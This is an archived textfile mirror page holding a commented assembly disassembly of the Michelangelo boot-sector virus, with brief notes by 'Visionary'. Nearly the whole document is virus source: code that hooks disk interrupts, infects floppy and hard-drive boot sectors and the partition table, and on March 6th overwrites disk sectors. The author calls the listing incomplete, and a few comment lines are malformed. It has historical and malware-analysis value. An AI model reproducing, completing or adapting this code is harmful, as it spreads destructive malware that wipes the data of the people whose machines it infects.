💾 Archived View for spam.works › mirrors › textfiles › virus › michangl.txt captured on 2023-11-14 at 12:52:18.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

;     Michelangelo
;     Size: 512
;     Type: Boot infector
;     Date of action: March 6th
;
;
 
data_1e		equ	4Ch			; (0000:004C=1DB1h)
data_2e		equ	4Eh			; (0000:004E=70h)
data_3e		equ	413h			; (0000:0413=280h)
data_4e		equ	7C05h			; (0000:7C05=203Ch)
data_5e		equ	7C0Ah			; (0000:7C0A=49EBh)
data_6e		equ	7C0Ch			; (0000:7C0C=2A3Ch)
data_7e		equ	7			; (694E:0007=0)
data_8e		equ	8			; (694E:0008=0)
data_9e		equ	0Ah			; (694E:000A=0)
data_11e	equ	7C03h			; (694E:7C03=0)
  
seg_a		segment
		assume	cs:seg_a, ds:seg_a
  
  
		org	100h
  
mich		proc	far
  
start:                      
		jmp	loc_6 ; (01AF) "This is what you see at sector 0"
		db	0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
		db	0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
		db	50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
		db	0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
		db	4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
		db	9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
		db	9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
		db	2, 0, 58h, 1Fh, 2Eh, 0FFh
		db	2Eh, 0Ah, 0, 50h, 53h, 51h
		db	52h, 1Eh, 6, 56h, 57h, 0Eh
		db	1Fh, 0Eh, 7, 0BEh, 4, 0
loc_1: ;Init registers
		mov	ax,201h
		mov	bx,200h
		mov	cx,1
		xor	dx,dx			; Zero register
		pushf				; Push flags
		call	dword ptr ds:data_9e	; (694E:000A=0)
		jnc	loc_2			; Jump if carry=0
		xor	ax,ax			; Zero register
		pushf				; Push flags
		call	dword ptr ds:data_9e	; (694E:000A=0)
		dec	si
		jnz	loc_1			; Jump if not zero
		jmp	short loc_5		; (01A6)
loc_2: ;Zero registers clear direction
		xor	si,si			; Zero register
		cld				; Clear direction
		lodsw				; String [si] to ax
		cmp	ax,[bx]
		jne	loc_3			; Jump if not equal
		lodsw				; String [si] to ax
		cmp	ax,[bx+2]
		je	loc_5			; Jump if equal
loc_3: ; cmp byte ptr See infected
		mov	ax,301h
		mov	dh,1
		mov	cl,3
		cmp	byte ptr [bx+15h],0FDh
		je	loc_4			; Jump if equal
		mov	cl,0Eh
loc_4: ;call out all db hiden data
		mov	ds:data_8e,cx		; (694E:0008=0)
		pushf				; Push flags
		call	dword ptr ds:data_9e	; (694E:000A=0)
		jc	loc_5			; Jump if carry Set
		mov	si,3BEh
		mov	di,1BEh
		mov	cx,21h
		cld				; Clear direction
		rep	movsw			; Rep while cx>0 Mov [si]
		mov	ax,301h                 ; to es:[di]
		xor	bx,bx			; Zero register
		mov	cx,1
		xor	dx,dx			; Zero register
		pushf				; Push flags
		call	dword ptr ds:data_9e	; (694E:000A=0)
loc_5: ;Clear all set
		pop	di
		pop	si
		pop	es
		pop	ds
		pop	dx
		pop	cx
		pop	bx
		pop	ax
		retn
loc_6: ;Load all hiden data
		xor	ax,ax			; Zero register
		mov	ds,ax
		cli				; Disable interrupts
		mov	ss,ax
		mov	ax,7C00h
		mov	sp,ax
		sti				; Enable interrupts
		push	ds
		push	ax
		mov	ax,ds:data_1e		; (0000:004C=1DB1h)
		mov	ds:data_5e,ax		; (0000:7C0A=49EBh)
		mov	ax,ds:data_2e		; (0000:004E=70h)
		mov	ds:data_6e,ax		; (0000:7C0C=2A3Ch)
		mov	ax,ds:data_3e		; (0000:0413=280h)
		dec	ax
		dec	ax
		mov	ds:data_3e,ax		; (0000:0413=280h)
		mov	cl,6
		shl	ax,cl			; Shift w/zeros fill
		mov	es,ax
		mov	ds:data_4e,ax		; (0000:7C05=203Ch)
		mov	ax,0Eh
		mov	ds:data_1e,ax		; (0000:004C=1DB1h)
		mov	ds:data_2e,es		; (0000:004E=70h)
		mov	cx,1BEh
		mov	si,7C00h
		xor	di,di			; Zero register
		cld				; Clear direction
		rep	movsb			; Rep while cx>0 Mov [si]
		jmp	dword ptr cs:data_11e	; to es:[di] (694E:7C03=0)
		db	33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
		db	0Eh, 1Fh, 0B8h, 1, 2, 0BBh      ;          cd 13
		db	0, 7Ch, 8Bh, 0Eh, 8, 0
		db	83h, 0F9h, 7, 75h, 7, 0BAh
		db	80h, 0, 0CDh, 13h, 0EBh, 2Bh
		db	8Bh, 0Eh, 8, 0, 0BAh, 0
		db	1, 0CDh, 13h, 72h, 20h, 0Eh
		db	7, 0B8h, 1, 2, 0BBh, 0
		db	2, 0B9h, 1, 0, 0BAh, 80h
		db	0, 0CDh, 13h, 72h, 0Eh, 33h
		db	0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
		db	4Fh, 0ADh, 3Bh, 47h, 2
		db	75h, 49h
loc_7:;check if it is time to nuke
		xor	cx,cx			; Zero register
		mov	ah,4
		int	1Ah ; Real time clock   ah=func 04h don't work on an xt
						; read date cx=year, dx=mon/day
		cmp	dx,306h                 ; See if March 6th
		je	loc_8			; Jump if equal to nuking subs
		retf				; Return to launch command.com
loc_8:;get ready
		xor	dx,dx			; Zero register
		mov	cx,1
loc_9:;run 7 times nuke 31.5 megs of hd
		mov	ax,309h
		mov	si,ds:data_8e		; (694E:0008=0)
		cmp	si,3
		je	loc_10			; Jump if equal
		mov	al,0Eh
		cmp	si,0Eh
		je	loc_10			; Jump if equal
		mov	dl,80h
		mov	byte ptr ds:data_7e,4	; (694E:0007=0)
		mov	al,11h
loc_10: ;nuke away 
		mov	bx,5000h
		mov	es,bx
		int	13h			; Disk  dl=drive a: ah=func 03h
						;  write sectors from mem es:bx
		jnc	loc_11			; Jump if carry=0
		xor	ah,ah			; Zero register
		int	13h			; Disk  dl=drive a: ah=func 00h
						;  reset disk, al=return status
loc_11: ;rest for loc-9 nuking
		inc	dh
		cmp	dh,ds:data_7e		; (694E:0007=0)
		jb	loc_9			; Jump if below
		xor	dh,dh			; Zero register
		inc	ch
		jmp	short loc_9		; (0250)
loc_12:;time to infect a floppie or hard dirve
		mov	cx,7
		mov	ds:data_8e,cx		; (694E:0008=0)
		mov	ax,301h
		mov	dx,80h
		int	13h	; Disk  dl=drive a: ah=func 03h infect flopie
						;  write sectors from mem es:bx
		jc	loc_7			; Jump if carry Set
		mov	si,3BEh
		mov	di,1BEh
		mov	cx,21h
		rep	movsw			; Rep while cx>0 Mov [si]
		mov	ax,301h                 : to es:[di]
		xor	bx,bx			; Zero register
		inc	cl
		int	13h ; Disk  dl=drive a: ah=func 03h lets infect hd
						;  write sectors from mem es:bx
;*		jmp	short loc_13		;*(02E0)
		db	0EBh, 32h
		db	1, 4, 11h, 0, 80h, 0
		db	5, 5, 32h, 1, 0, 0
		db	0, 0, 0
		db	53h, 53h, 20h, 20h, 43h, 4Fh
		db	4Dh
		db	58 dup (0)
		db	55h, 0AAh
  
seg_a		ends

;Last notes this virus looks like a poor hack job on the stoned virus.
;It is kinda cool in the fact that it is hard to get out of the partition table
;even if you nuke the partition table it will live on even if you replace it.
;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
;this virus uses int 1ah which doesn't work on an XT system.
;the virus isn't actually 512 but that is how much it writes.
;it moves the boot area of a floppy to the last sector on the disk
;and on a harddrive it moves it to the last sector in the root directory
;This should show you all how much the media can over do it on things
;since this is really a lame virus,to tell you the truth there is a lot better
;ones out there.
;This in no way is a complete listing of the code for the virus.
;Nor is it the best since i'm not the best at Assembly.
;Done by Visionary.
;BTW to who ever wrote this virus... Get a life!  

-------------------------------------------------------------------------------
Downloaded From P-80 Systems 304-744-2253